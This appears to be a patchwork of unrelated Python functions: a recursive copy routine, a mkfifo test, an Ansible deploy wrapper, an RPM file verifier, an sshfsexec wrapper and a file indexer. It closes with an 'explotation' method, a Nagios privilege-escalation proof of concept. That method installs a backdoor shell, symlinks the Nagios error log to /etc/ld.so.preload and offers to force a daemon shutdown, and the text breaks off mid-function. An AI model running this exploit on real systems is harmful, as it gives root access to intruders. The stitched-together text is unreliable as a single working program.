                          "must specify 'recursive' to copy a directory",
                          spath)
        # 'cp dir1 dir2' at the top level copies dir1 INTO dir2.
        if not __recursion and tstat and stat.S_ISDIR(tstat.st_mode):
            tpath = os.path.join(tpath, _basename(spath))
            try:
                tstat = os.stat(tpath)
            except OSError:
                tstat = None
            target = (tpath, tstat)
        # Get list of files to copy over before creation of target dir
        # to avoid infinite loop if copying dir into itself.
        subfiles = os.listdir(spath)
        if not tstat:
            if log and verbose:
                log("`%s' -> `%s'", spath, tpath)
            os.mkdir(tpath)
        # Set attributes properly.
        if preserve:
            os.chmod(tpath, stat.S_IMODE(smode))
            os.utime(tpath, (sstat.st_atime, sstat.st_mtime))
        elif not tstat:
            # i.e. the target did not exist before the copy
            perm = stat.S_IMODE(smode) & ~_getumask()
            os.chmod(tpath, perm)
        # Recurse into the directory entries.
        for subfile in subfiles:
            subsource_path = os.path.join(spath, subfile)
            subsource = (subsource_path, os.stat(subsource_path))
            subtarget_path = os.path.join(tpath, subfile)
            try:
                subtarget_stat = os.stat(subtarget_path)
            except OSError:
                subtarget_stat = None
            subtarget = (subtarget_path, subtarget_stat)
            _cp(subsource, subtarget, force, recursive, preserve, log,
                verbose, __recursion=1)
    elif stat.S_ISLNK(smode):
        raise NotImplementedError(
            "don't yet know how to copy symbolic links: `%s'" % spath)
    elif stat.S_ISCHR(smode):
        raise NotImplementedError(
            "don't yet know how to copy character special device files: `%s'"
            % spath)
    elif stat.S_ISBLK(smode):
        raise NotImplementedError(
            "don't yet know how to copy block special device files: `%s'"
            % spath)
    elif stat.S_ISFIFO(smode):
        raise NotImplementedError(
            "don't yet know how to copy a FIFO (named pipe): `%s'" % spath)
    elif stat.S_ISSOCK(smode):
        raise NotImplementedError("don't yet know how to copy a socket: `%s'"
                                  % spath)
    else:
        raise NotImplementedError("unknown file type: `%s' (mode bits: %s)"
                                  % (spath, oct(stat.S_IFMT(smode))))
def test_mkfifo(self):
    """mkfifo() must create a node that stat() reports as a FIFO."""
    fifo_path = support.TESTFN
    support.unlink(fifo_path)
    posix.mkfifo(fifo_path, stat.S_IRUSR | stat.S_IWUSR)
    self.assertTrue(stat.S_ISFIFO(posix.stat(fifo_path).st_mode))
def deploy(args):
    """Run the bundled django-stack Ansible playbook against an inventory.

    Returns 0 on success, 1 on usage/Ansible error, 2 when hosts failed,
    3 when hosts were unreachable. NOTE(review): Python 2 code (print
    statements, `except X, e`) built on the pre-2.0 Ansible API.
    """
    # create parser for CLI options
    parser = utils.base_parser(
        constants=C,
        usage="%prog playbook.yml",
        connect_opts=True,
        runas_opts=True,
        subset_opts=True,
        check_opts=True,
        diff_opts=True
    )
    parser.add_option(
        '-e', '--extra-vars', dest="extra_vars", action="append",
        help="set additional variables as key=value or YAML/JSON",
        default=[])

    options, args = parser.parse_args(args)

    if len(args) == 0:
        parser.print_help(file=sys.stderr)
        return 1

    # Build the host inventory, optionally restricted with --limit.
    inventory = ansible.inventory.Inventory(options.inventory)
    inventory.subset(options.subset)
    print "number of hosts: %s" % str(len(inventory.list_hosts()))
    if len(inventory.list_hosts()) == 0:
        raise errors.AnsibleError("provided hosts list is empty")

    # Collect SSH/sudo credentials as configured.
    sshpass = None
    sudopass = None
    options.ask_pass = options.ask_pass or C.DEFAULT_ASK_PASS
    if options.connection == "local":
        options.ask_pass = False
    options.ask_sudo_pass = options.ask_sudo_pass or C.DEFAULT_ASK_SUDO_PASS
    (sshpass, sudopass) = utils.ask_passwords(
        ask_pass=options.ask_pass, ask_sudo_pass=options.ask_sudo_pass)
    options.sudo_user = options.sudo_user or C.DEFAULT_SUDO_USER

    # Merge all --extra-vars inputs (file, inline YAML/JSON, or key=value).
    extra_vars = {}
    for extra_vars_opt in options.extra_vars:
        if extra_vars_opt.startswith("@"):
            # Argument is a YAML file (JSON is a subset of YAML)
            extra_vars = utils.combine_vars(
                extra_vars, utils.parse_yaml_from_file(extra_vars_opt[1:]))
        elif extra_vars_opt and extra_vars_opt[0] in '[{':
            # Arguments as YAML
            extra_vars = utils.combine_vars(extra_vars,
                                            utils.parse_yaml(extra_vars_opt))
        else:
            # Arguments as Key-value
            extra_vars = utils.combine_vars(extra_vars,
                                            utils.parse_kv(extra_vars_opt))

    # The playbook ships inside the installed `underwear` package.
    playbook = underwear.__path__[0] + '/django-stack.yml'

    inventory.set_playbook_basedir(os.path.dirname(playbook))
    stats = callbacks.AggregateStats()
    playbook_cb = callbacks.PlaybookCallbacks(verbose=utils.VERBOSITY)
    runner_cb = callbacks.PlaybookRunnerCallbacks(stats,
                                                  verbose=utils.VERBOSITY)

    if not os.path.exists(playbook):
        raise errors.AnsibleError("the playbook: %s could not be found" % \
            playbook)
    # A FIFO is accepted as a playbook source as well as a regular file.
    if not (os.path.isfile(playbook) or \
            stat.S_ISFIFO(os.stat(playbook).st_mode)):
        raise errors.AnsibleError( \
            "the playbook: %s does not appear to be a file" % playbook)

    pb = ansible.playbook.PlayBook(playbook=playbook,
                                   module_path=options.module_path,
                                   inventory=inventory,
                                   forks=options.forks,
                                   remote_user=options.remote_user,
                                   remote_pass=sshpass,
                                   callbacks=playbook_cb,
                                   runner_callbacks=runner_cb,
                                   stats=stats,
                                   timeout=options.timeout,
                                   transport=options.connection,
                                   sudo=options.sudo,
                                   sudo_user=options.sudo_user,
                                   sudo_pass=sudopass,
                                   extra_vars=extra_vars,
                                   private_key_file=options.private_key_file,
                                   only_tags=[
                                       'all',
                                   ],
                                   skip_tags=None,
                                   check=options.check,
                                   diff=options.diff)

    failed_hosts = []
    unreachable_hosts = []

    try:
        pb.run()

        hosts = sorted(pb.stats.processed.keys())
        print hosts
        display(callbacks.banner("PLAY RECAP"))
        playbook_cb.on_stats(pb.stats)

        # Classify each host by its run summary.
        for h in hosts:
            t = pb.stats.summarize(h)
            if t['failures'] > 0:
                failed_hosts.append(h)
            if t['unreachable'] > 0:
                unreachable_hosts.append(h)

        # Offer a retry inventory for the hosts that did not complete.
        retries = failed_hosts + unreachable_hosts
        if len(retries) > 0:
            filename = pb.generate_retry_inventory(retries)
            if filename:
                display(" to retry, use: --limit @%s\n" % filename)

        # Per-host recap: colored to screen, plain to the log.
        for h in hosts:
            t = pb.stats.summarize(h)

            display("%s : %s %s %s %s" %
                    (hostcolor(h, t),
                     colorize('ok', t['ok'], 'green'),
                     colorize('changed', t['changed'], 'yellow'),
                     colorize('unreachable', t['unreachable'], 'red'),
                     colorize('failed', t['failures'], 'red')),
                    screen_only=True)

            display("%s : %s %s %s %s" %
                    (hostcolor(h, t, False),
                     colorize('ok', t['ok'], None),
                     colorize('changed', t['changed'], None),
                     colorize('unreachable', t['unreachable'], None),
                     colorize('failed', t['failures'], None)),
                    log_only=True)

        print ""
        if len(failed_hosts) > 0:
            return 2
        if len(unreachable_hosts) > 0:
            return 3

    except errors.AnsibleError, e:
        display("ERROR: %s" % e, color='red')
        return 1
def rpm_verify_file(fileinfo, rpmlinktos, omitmask):
    """
    Verify all the files in a package.

    Returns a list of error flags, the file type and file name.  The list
    entries are strings that are the same as the labels for the bitwise
    flags used in the C code.

    fileinfo   -- one RPM header file entry (name, size, mode, mtime, flags,
                  rdev, inode, nlink, state, vflags, user, group, md5).
    rpmlinktos -- the link target recorded in the RPM metadata.
    omitmask   -- RPMVERIFY_* bits the caller wants skipped.
    """
    (fname, fsize, fmode, fmtime, fflags, frdev, finode, fnlink, fstate, \
     vflags, fuser, fgroup, fmd5) = fileinfo

    # 1. rpmtsRootDir stuff. What does it do and where to I get it from?

    file_results = []
    flags = vflags

    # Check to see if the file was installed - if not pretend all is ok.
    # This is what the rpm C code does!
    if fstate != rpm.RPMFILE_STATE_NORMAL:
        return file_results

    # Get the installed files stats
    try:
        lstat = os.lstat(fname)
    except OSError:
        # Missing file is only an error unless the package marks it
        # missing-ok or ghost.
        if not (fflags & (rpm.RPMFILE_MISSINGOK | rpm.RPMFILE_GHOST)):
            file_results.append('RPMVERIFY_LSTATFAIL')
            #file_results.append(fname)
        return file_results

    # 5. Contexts? SELinux stuff?

    # Setup what checks to do.  This is straight out of the C code.
    if stat.S_ISDIR(lstat.st_mode):
        flags &= DIR_FLAGS
    elif stat.S_ISLNK(lstat.st_mode):
        flags &= LINK_FLAGS
    elif stat.S_ISFIFO(lstat.st_mode):
        flags &= FIFO_FLAGS
    elif stat.S_ISCHR(lstat.st_mode):
        flags &= CHR_FLAGS
    elif stat.S_ISBLK(lstat.st_mode):
        flags &= BLK_FLAGS
    else:
        flags &= REG_FLAGS

    if (fflags & rpm.RPMFILE_GHOST):
        flags &= GHOST_FLAGS

    flags &= ~(omitmask | RPMVERIFY_FAILURES)

    # 8. SELinux stuff.

    prelink_size = 0
    if flags & RPMVERIFY_MD5:
        # Prelink-aware checksum: prelink_md5_check handles prelinked
        # binaries whose on-disk md5 differs from the package md5.
        prelink_md5, prelink_size = prelink_md5_check(fname)
        if prelink_md5 == False:
            file_results.append('RPMVERIFY_MD5')
            file_results.append('RPMVERIFY_READFAIL')
        elif prelink_md5 != fmd5:
            file_results.append('RPMVERIFY_MD5')

    if flags & RPMVERIFY_LINKTO:
        linkto = os.readlink(fname)
        if not linkto:
            file_results.append('RPMVERIFY_READLINKFAIL')
            file_results.append('RPMVERIFY_LINKTO')
        else:
            if len(rpmlinktos) == 0 or linkto != rpmlinktos:
                file_results.append('RPMVERIFY_LINKTO')

    if flags & RPMVERIFY_FILESIZE:
        if not (flags & RPMVERIFY_MD5):  # prelink check hasn't been done.
            prelink_size = prelink_size_check(fname)
        if (prelink_size != 0):  # This is a prelinked file.
            if (prelink_size != fsize):
                file_results.append('RPMVERIFY_FILESIZE')
        elif lstat.st_size != fsize:  # It wasn't a prelinked file.
            file_results.append('RPMVERIFY_FILESIZE')

    if flags & RPMVERIFY_MODE:
        metamode = fmode
        filemode = lstat.st_mode

        # Comparing the type of %ghost files is meaningless, but perms are ok.
        if fflags & rpm.RPMFILE_GHOST:
            metamode &= ~0xf000
            filemode &= ~0xf000

        if (stat.S_IFMT(metamode) != stat.S_IFMT(filemode)) or \
           (stat.S_IMODE(metamode) != stat.S_IMODE(filemode)):
            file_results.append('RPMVERIFY_MODE')

    if flags & RPMVERIFY_RDEV:
        # Device type must match; for matching device nodes the actual
        # major/minor numbers must match too.
        if (stat.S_ISCHR(fmode) != stat.S_ISCHR(lstat.st_mode) or
                stat.S_ISBLK(fmode) != stat.S_ISBLK(lstat.st_mode)):
            file_results.append('RPMVERIFY_RDEV')
        elif (s_isdev(fmode) & s_isdev(lstat.st_mode)):
            st_rdev = lstat.st_rdev
            if frdev != st_rdev:
                file_results.append('RPMVERIFY_RDEV')

    if flags & RPMVERIFY_MTIME:
        if lstat.st_mtime != fmtime:
            file_results.append('RPMVERIFY_MTIME')

    if flags & RPMVERIFY_USER:
        try:
            user = pwd.getpwuid(lstat.st_uid)[0]
        except KeyError:
            user = None
        if not user or not fuser or (user != fuser):
            file_results.append('RPMVERIFY_USER')

    if flags & RPMVERIFY_GROUP:
        try:
            group = grp.getgrgid(lstat.st_gid)[0]
        except KeyError:
            group = None
        if not group or not fgroup or (group != fgroup):
            file_results.append('RPMVERIFY_GROUP')

    return file_results
def main(configcode=''):
    """sshfsexec entry point: transparently re-run a command on the SSH host
    backing an SSHFS mount.

    Translates the cwd and any path arguments that live under SSHFS mounts
    into their remote equivalents, then either execs `ssh <host> <command>`
    (with tty/stdio plumbing matched to the local invocation) or falls back
    to the real local binary this wrapper shadows on $PATH.

    configcode -- user configuration source, exec()'d twice (before and
                  after argument processing) so it can tweak the local
                  variables here (preserve_isatty, coerce_remote_execution,
                  envpassthrough, ...). NOTE(review): Python 2 code
                  (iteritems, pipes.quote); exec-into-locals makes this
                  function extremely order-sensitive.
    """
    mountmap = sshfsmountmap()
    command, originalargs = os.path.basename(sys.argv[0]), sys.argv[1:]
    envpassthrough = dict()
    environment = dict(os.environ)
    stdin_is_pipe = stat.S_ISFIFO(os.fstat(0).st_mode)

    # Configuration defaults
    translate_all_arguments = False
    preserve_isatty = False
    coerce_remote_execution = False

    # Figure out where the current working directory is on the remote system.
    cwdtranslation = translatepath(os.getcwd(), mountmap)
    if cwdtranslation:
        sshlogin, remotecwd, basemountpoint = cwdtranslation
        sshhost = sshlogin.split('@')[0] if '@' in sshlogin else sshlogin
    else:
        sshlogin = None

    # First execution of configuration code prior to processing arguments.
    pre_process_config = True
    exec(configcode)

    remoteargs = list()
    for argument in originalargs:
        translation = translatepath(argument, mountmap)

        if not translation:
            # Argument is not under any SSHFS mount; pass it through as-is.
            remoteargs.append(argument)
            continue

        login, transpath, argmountpoint = translation
        arghost = login.split('@')[0] if '@' in login else login

        # Paths used with coerced execution must be absolute
        if coerce_remote_execution and not cwdtranslation:
            argument = transpath

        if not sshlogin and coerce_remote_execution:
            # First SSHFS path seen decides the remote host when coercing.
            sshlogin = login
            basemountpoint = argmountpoint
            sshhost = sshlogin.split('@')[0] if '@' in sshlogin else sshlogin
        elif sshlogin and arghost != sshhost:
            # All SSHFS arguments must target the same host.
            print("SSHFS host mismatch.", file=sys.stderr)
            exit(EXIT_SSHFS_HOST_MISMATCH)

        # If the argument is an absolute path or a relative path that crosses
        # over to a different SSHFS mount point, use an absolute path for the
        # remote command.
        if sshlogin and basemountpoint != argmountpoint or argument[0] == '/':
            remoteargs.append(transpath)
        else:
            if cwdtranslation:
                # Ensure the mount point is not referenced by its local name,
                # e.g. ../../mountpoint/subfolder. If is is, switch to an
                # absolute path.
                argupdirs = os.path.normpath(argument).split('/').count('..')
                highestreference = os.path.abspath(('../' * (argupdirs - 1)))
                refmount = mountmap.get(highestreference)

                if refmount:
                    remotebasename = os.path.basename(refmount[1])
                    localmountname = os.path.basename(highestreference)

                if argupdirs and refmount and remotebasename != localmountname:
                    remoteargs.append(transpath)
                    continue

            remoteargs.append(argument)

    # Second execution of configuration code after processing arguments.
    pre_process_config = False
    exec(configcode)

    if sshlogin:
        # If the command should be executed on a remote server, generate the
        # execution string to pass into the shell.
        executed = listtoshc([command] + remoteargs)

        # Prepend environment variable declarations
        for variable, value in envpassthrough.iteritems():
            executed = '%s=%s %s' % (variable, pipes.quote(value), executed)

        if cwdtranslation:
            # If the current working directory is inside an SSHFS mount, cd
            # into the corresponding remote directory first. Why the brackets?
            # When data is piped into cd without cd being in a command group,
            # cd will not work:
            #
            #   ~% echo example | cd / && pwd
            #   /home/jameseric
            #   ~% echo example | { cd / && pwd; }
            #   /
            #
            quotedremotecwd = pipes.quote(remotecwd)
            sshcommand = '{ cd %s && %s; }' % (quotedremotecwd, executed)
        else:
            sshcommand = executed

        # Decide the ssh tty option so the remote process sees the same
        # isatty() results as this local invocation would.
        ttys = [fd.isatty() for fd in (sys.stdin, sys.stdout, sys.stderr)]
        if any(ttys):
            ttyoption = '-t'
            if not preserve_isatty:
                # Only create a tty if stdin and stdout are attached a tty.
                ttyoption = '-t' if all(ttys[0:2]) else '-T'

            elif not all(ttys):
                # Do some kludgey stuff to make isatty for the remote process
                # match the what sshfsexec sees.
                if not ttys[0]:
                    sshcommand = 'stty -echo; /bin/cat | ' + sshcommand
                    ttyoption = '-tt'
                if not ttys[1]:
                    sshcommand += ' | /bin/cat'
                if not ttys[2]:
                    sshcommand = (
                        'exec 3>&1; %s 2>&1 >&3 3>&- | /bin/cat >&2'
                        % sshcommand)
        else:
            ttyoption = '-T'

        argv = [SSH_BINARY]
        if ttyoption == '-T':
            argv += ['-e', 'none']

        argv += [sshlogin, ttyoption, sshcommand]

    else:
        # If the command does not interact with any SSHFS-mounted paths, run
        # the executable that the script replaced.
        path = os.environ.get('PATH', '')
        while path:
            replacedbinary = which(command, path)

            if replacedbinary:
                # Skip over this wrapper itself so we do not re-exec in a loop.
                if os.path.samefile(__file__, replacedbinary):
                    if ':' in path:
                        _, path = path.split(':', 1)
                        continue
                else:
                    break

            print("sshfsexec: %s: command not found" % command)
            exit(EXIT_COMMAND_NOT_FOUND)

        argv = [replacedbinary] + originalargs

    # Replace the current process; does not return.
    os.execvpe(argv[0], argv, environment)
def update_db_timer_slot(self):
    """Timer slot: drain ``self.qqueue`` and index each queued root path.

    Each queued item is a dict with ``'path'`` (directory tree to scan) and
    ``'uuid'`` (used as the DB table name).  For NTFS volumes the $MFT may be
    parsed directly (C++ or Python parser); otherwise the tree is walked
    breadth-first with ``os.scandir`` (or ``os.listdir`` fallback) and records
    are handed to an ``Insert_db_thread`` through ``sql_insert_queue``.
    Honors ``self.flag.quit_flag`` / ``self.flag.restart_flag`` throughout;
    always finishes by merging the DB and emitting a "done" progress signal.
    """
    # Pick up a possibly-changed polling interval before doing any work.
    if self.update_db_timer.interval() != GlobalVar.DB_UPDATE_INTERVAL:
        self.update_db_timer.setInterval(GlobalVar.DB_UPDATE_INTERVAL)
    self.flag.restart_flag = False
    if self.flag.quit_flag:
        return
    # Nothing queued: just re-arm the timer and wait for the next tick.
    if self.qqueue.empty():
        self.update_db_timer.start()
        return
    # Reload the user-configured exclusion list on every run.
    settings = QSettings(QSettings.IniFormat, QSettings.UserScope,
                         ORGANIZATION_NAME, ALLICATION_NAME)
    excluded_folders = settings.value('Excluded_folders', type=str,
                                      defaultValue='')
    try:
        # NOTE(review): list() of a str yields single characters, not folder
        # paths — presumably a split on some separator was intended; confirm
        # the stored format of 'Excluded_folders'.
        self.skip_dir = list(excluded_folders)
    except Exception as e:
        logger.error('Wrong format: Excluded folders, ' + str(e))
        self.skip_dir = []
    while not self.qqueue.empty():
        if self.flag.restart_flag:
            break
        if self.flag.quit_flag:
            return
        # Pop the next work item under the queue mutex.
        self.mutex.lock()
        if self.qqueue.empty():
            self.mutex.unlock()
            continue  # break
        _item = self.qqueue.get()
        self.mutex.unlock()
        # self.con.commit()
        # TODO: try catch
        try:
            root_path = _item['path']
            uuid = _item['uuid']
            if self.flag.quit_flag:
                break
            root_path = _unicode(root_path)
            # Prefix length used to strip the root from stored paths;
            # 0 for a one-char root (e.g. '/') so the leading slash is kept.
            root_path_len = len(root_path) if len(root_path) > 1 else 0
            print('Enter root_path: %s' % root_path)
            if root_path in self.skip_dir:
                print('Dir %s skipped.' % root_path)
                continue
            if (not os.path.exists(root_path)):
                logger.warning("Dir %s does not exists." % root_path)
                self.show_statusbar_warning_msg_SIGNAL.emit(
                    "Dir %s does not exists."
                    % root_path)
                continue
            # try:
            # Device major/minor numbers identify the volume; compared below
            # to skip entries living on a different device.
            if os.lstat(root_path).st_dev != 0:
                device_maj_num = os.major(os.lstat(root_path).st_dev)
                device_min_num = os.minor(os.lstat(root_path).st_dev)
            else:
                device_maj_num = device_min_num = 0
            # uuid = self.UUID_class.deviceID_to_UUID((device_maj_num, device_min_num))
            fstype = SystemDevices.deviceDict[(device_maj_num,
                                               device_min_num)]['fstype']
            table_name = uuid
            self.init_table(table_name, clear_table=False)
            # Worker thread that consumes sql_insert_queue and writes rows.
            insert_db_thread = Insert_db_thread(
                uuid,
                parent=self,
                sql_insert_queue=self.sql_insert_queue,
                sql_insert_mutex=self.sql_insert_mutex,
                sql_insert_condition=self.sql_insert_condition)
            insert_db_thread.update_progress_SIGNAL.connect(
                self.parent().on_db_progress_update,
                QtCore.Qt.QueuedConnection)
            insert_db_thread.start()
            enable_MFT_parser = GlobalVar.USE_MFT_PARSER
            # self.update_progress_SIGNAL.emit(-1, -1, uuid)  # start
            MFT_parser_successful_flag = False
            # Fast path: parse the NTFS Master File Table instead of walking
            # the tree.  Any failure falls through to the generic walk below.
            if fstype == "ntfs" and enable_MFT_parser:
                try:
                    MFT_file_path = os.path.join(root_path, "$MFT")
                    logger.info("Enter NTFS folder: %s" % root_path)
                    if not os.path.exists(MFT_file_path):
                        # NOTE(review): applying % to a format string with no
                        # placeholder raises TypeError here (caught by the
                        # enclosing except) — likely meant "... %s ..." %
                        # MFT_file_path; confirm.
                        logger.warning("$MFT file does not exists." %
                                       MFT_file_path)
                        raise Exception("$MFT file does not exists." %
                                        MFT_file_path)
                    # FIXME: In linux, cannot get the latest MFT; "sync" does not work. Linux cache?
                    # settings = QSettings(QSettings.IniFormat, QSettings.UserScope, ORGANIZATION_NAME, ALLICATION_NAME)
                    enable_C_MFT_parser = GlobalVar.USE_MFT_PARSER_CPP
                    logger.info("enable_C_MFT_parser: " +
                                str(enable_C_MFT_parser))
                    if enable_C_MFT_parser:
                        # The C++ parser writes the DB itself, so stop the
                        # Python insert thread first (without committing
                        # progress).
                        insert_db_thread.pre_quit(
                            commit_progress_flag=False)
                        pass
                        insert_db_thread.update_progress_SIGNAL.emit(
                            1, -3, uuid)
                        mft_parser_cpp(MFT_file_path, TEMP_DB_NAME,
                                       table_name)
                        insert_db_thread.update_progress_SIGNAL.emit(
                            -2, -2, uuid)
                    else:
                        # Pure-Python MFT parser feeding the insert queue;
                        # poll it so quit/restart can interrupt the wait.
                        session = MftSession(MFT_file_path)
                        session.start(table_name, self.sql_insert_queue,
                                      self.sql_insert_mutex,
                                      self.sql_insert_condition)
                        while session.isRunning():
                            session.wait(timeout_ms=1000)
                            logger.info("Waiting... Running...")
                            if self.flag.quit_flag or self.flag.restart_flag:
                                break
                        session.quit()
                        del session
                    MFT_parser_successful_flag = True
                except Exception as e:
                    # Fall back to the generic directory walk below.
                    logger.error(str(e))
                    self.show_statusbar_warning_msg_SIGNAL.emit(str(e))
            if not MFT_parser_successful_flag:
                # Generic path: breadth-first walk of the directory tree.
                num_records = 0
                mftsize = estimate_num_of_files(root_path)
                dir_queue = collections.deque()
                dir_queue.append(root_path)
                while dir_queue:
                    if OS_SCANDIR_FLAG:
                        if self.flag.quit_flag or self.flag.restart_flag:
                            break
                        next_path = dir_queue.popleft()  # BFS
                        # next_path = dir_queue.pop()  # DFS
                        try:
                            for entry in os.scandir(next_path):
                                num_records += 1
                                if self.flag.quit_flag or self.flag.restart_flag:
                                    break
                                file_or_dir = entry.name
                                full_file_or_dir = entry.path
                                if entry.is_symlink():
                                    # symbolic link
                                    continue
                                l_stat = entry.stat(
                                    follow_symlinks=FOLLOW_SYMLINKS_FLAG)
                                if l_stat.st_dev != 0:
                                    major_dnum = os.major(l_stat.st_dev)
                                    minor_dnum = os.minor(l_stat.st_dev)
                                else:
                                    major_dnum = minor_dnum = 0
                                # Optionally skip entries on another device
                                # (e.g. nested mount points).
                                if GlobalVar.SKIP_DIFF_DEV and (
                                        (device_maj_num != major_dnum) or
                                        (device_min_num != minor_dnum)):
                                    print(
                                        "In different device: %s vs. %s" %
                                        (full_file_or_dir, root_path))
                                    continue
                                if entry.is_dir(
                                        follow_symlinks=FOLLOW_SYMLINKS_FLAG
                                ):
                                    # https://docs.python.org/2/library/stat.html
                                    # It's a directory, recurse into it
                                    if full_file_or_dir in self.skip_dir:
                                        print('Dir %s skipped.'
                                              % full_file_or_dir)
                                        continue
                                    dir_queue.append(entry.path)
                                    # Record layout: [name, parent dir
                                    # (root-relative, '/' for the root
                                    # itself), size, is_dir, atime, mtime,
                                    # ctime].
                                    self.sql_insert_mutex.lock()
                                    self.sql_insert_queue.put([
                                        table_name,
                                        [
                                            file_or_dir,
                                            next_path[root_path_len:]
                                            if next_path[root_path_len:] else
                                            '/' + next_path[root_path_len:],
                                            None, True,
                                            int(l_stat.st_atime),
                                            int(l_stat.st_mtime),
                                            int(l_stat.st_ctime)
                                        ], num_records, mftsize, uuid
                                    ])
                                    self.sql_insert_condition.wakeOne()
                                    self.sql_insert_mutex.unlock()
                                elif entry.is_file(
                                        follow_symlinks=FOLLOW_SYMLINKS_FLAG
                                ):
                                    self.sql_insert_mutex.lock()
                                    self.sql_insert_queue.put([
                                        table_name,
                                        [
                                            file_or_dir,
                                            next_path[root_path_len:]
                                            if next_path[root_path_len:] else
                                            '/' + next_path[root_path_len:],
                                            l_stat.st_size, False,
                                            int(l_stat.st_atime),
                                            int(l_stat.st_mtime),
                                            int(l_stat.st_ctime)
                                        ], num_records, mftsize, uuid
                                    ])
                                    self.sql_insert_condition.wakeOne()
                                    self.sql_insert_mutex.unlock()
                        except Exception as e:
                            print(e)
                            continue
                    else:
                        # Fallback for interpreters without os.scandir.
                        if self.flag.quit_flag or self.flag.restart_flag:
                            break
                        next_path = dir_queue.popleft()
                        try:
                            for file_or_dir in os.listdir(next_path):
                                num_records += 1
                                full_file_or_dir = os.path.join(
                                    next_path, file_or_dir)
                                try:
                                    l_stat = os.lstat(full_file_or_dir)
                                except OSError as e:
                                    print(e)
                                    continue
                                mode = l_stat.st_mode
                                if stat.S_ISLNK(mode):
                                    # symbolic link
                                    continue
                                if l_stat.st_dev != 0:
                                    major_dnum = os.major(l_stat.st_dev)
                                    minor_dnum = os.minor(l_stat.st_dev)
                                else:
                                    major_dnum = minor_dnum = 0
                                if GlobalVar.SKIP_DIFF_DEV and (
                                        (device_maj_num != major_dnum) or
                                        (device_min_num != minor_dnum)):
                                    print(
                                        "In different device: %s vs. %s" %
                                        (full_file_or_dir, root_path))
                                    continue
                                if stat.S_ISDIR(mode):
                                    # https://docs.python.org/2/library/stat.html
                                    # It's a directory, recurse into it
                                    if full_file_or_dir in self.skip_dir:
                                        print('Dir %s skipped.'
                                              % full_file_or_dir)
                                        continue
                                    dir_queue.append(full_file_or_dir)
                                    # NOTE(review): the matching lock() is
                                    # commented out here, yet unlock() below
                                    # is still executed — confirm this
                                    # unbalanced unlock is intentional.
                                    # self.sql_insert_mutex.lock()
                                    self.sql_insert_queue.put([
                                        table_name,
                                        [
                                            file_or_dir,
                                            next_path[root_path_len:]
                                            if next_path[root_path_len:] else
                                            '/' + next_path[root_path_len:],
                                            None, True,
                                            int(l_stat.st_atime),
                                            int(l_stat.st_mtime),
                                            int(l_stat.st_ctime)
                                        ], num_records, mftsize, uuid
                                    ])
                                    self.sql_insert_condition.wakeOne()
                                    self.sql_insert_mutex.unlock()
                                elif stat.S_ISREG(mode):
                                    # regular file
                                    self.sql_insert_mutex.lock()
                                    self.sql_insert_queue.put([
                                        table_name,
                                        [
                                            file_or_dir,
                                            next_path[root_path_len:]
                                            if next_path[root_path_len:] else
                                            '/' + next_path[root_path_len:],
                                            l_stat.st_size, False,
                                            int(l_stat.st_atime),
                                            int(l_stat.st_mtime),
                                            int(l_stat.st_ctime)
                                        ], num_records, mftsize, uuid
                                    ])
                                    self.sql_insert_condition.wakeOne()
                                    self.sql_insert_mutex.unlock()
                                elif stat.S_ISSOCK(mode):
                                    # print('Found socket: %s' % full_file_or_dir)
                                    continue
                                elif stat.S_ISFIFO(mode):
                                    # print('Found FIFO (named pipe): %s' % full_file_or_dir)
                                    continue
                                else:
                                    # raise Exception("Unkown file type: " + full_file_or_dir)
                                    # print ("Unkown file type: " + full_file_or_dir)
                                    continue
                        except Exception as e:  # OSError
                            # print(e)
                            continue
            # self.update_progress_SIGNAL.emit(-2, -2, uuid)  # end
            logger.info("ALl sql_insert queued.")
            # Wait for the insert thread to drain the queue before merging.
            while not self.sql_insert_queue.empty():
                if self.flag.quit_flag or self.flag.restart_flag:
                    break
                time.sleep(0.1)
            logger.info(" sql_insert queue empty.. or quit/restart" +
                        str(self.flag.quit_flag) +
                        str(self.flag.restart_flag))
        except Exception as e:
            print("Error when updating db: " + str(e))
            self.show_statusbar_warning_msg_SIGNAL.emit(
                "Error when updating db: " + str(e))
        finally:
            # Always stop the worker, merge results, and signal completion.
            try:
                insert_db_thread.quit()
            except:
                pass
            self.merge_db_slot()
            self.update_progress_SIGNAL.emit(-3, -3, uuid)  # Done
def explotation(self):
    """Run the PoC sequence for the Nagios log-symlink / ld.so.preload issue.

    Visible steps, in order: copy the low-privilege backdoor shell into
    place; symlink the Nagios error log to the preload file path; wait for
    a Nagios restart (optionally asking the daemon to shut down via its
    command file); verify the command pipe is a FIFO; write an entry naming
    PRIVESCLIB through the pipe; then run a shell command under sudo to
    trigger the preloaded library.  Exits the process on failed steps.
    """
    # Install the low-privilege backdoor shell and show where it landed.
    subprocess.run(["cp", self.BACKDOORSH, self.BACKDOORPATH],
                   stdout=subprocess.PIPE,
                   stderr=subprocess.PIPE)
    backdoor_path = Popen(["ls", "-l", self.BACKDOORPATH],
                          stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE).communicate()[0]
    self.print_info("Backdoor/low-priv shell installed at: \n" +
                    backdoor_path.decode('utf-8').strip())
    # Safety check
    if self.check_file_exists(self.preload_file_name):
        self.print_warn(
            "/etc/ld.so.preload already exists. Exiting for safety.")
        self.cleanexit()
        sys.exit(2)
    # Symlink the Nagios log file
    error_log = self.options["nagios_error_log"][1]
    stdout, stderr = Popen("rm -f " + error_log + " && ln -s " +
                           self.preload_file_name + " " + error_log,
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE,
                           shell=True).communicate()
    # NOTE(review): str(stdout) is never None, so the first clause is always
    # true; the effective check is "any output means failure" — confirm.
    if (str(stdout) != None and str(stderr) != None) and (
            stdout.decode('utf-8') != "" or stderr.decode('utf-8') != ""):
        self.print_warn("Couldn't remove the " + error_log +
                        " file or create a symlink.")
        self.cleanexit()
        sys.exit(3)
    symlynk_path = Popen(["ls", "-l", error_log],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE).communicate()[0]
    self.print_info(
        "The system appears to be exploitable (writable logdir) ! :) Symlink created at: \n"
        + symlynk_path.decode('utf-8').strip())
    # Starting real explotation
    self.print_info("Waiting for Nagios service to get restarted...")
    response = input(
        "Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] "
    )
    if response.upper() == "Y":
        # Ask the daemon to shut itself down via its external command file.
        command = "/usr/bin/printf \"[%lu] SHUTDOWN_PROGRAM\\n\" `date +%s` > " + self.commandfile
        stdout, stderr = Popen(command,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE,
                               shell=True).communicate()
        sleep(3)
        # Confirm via ps whether the nagios binary is still running.
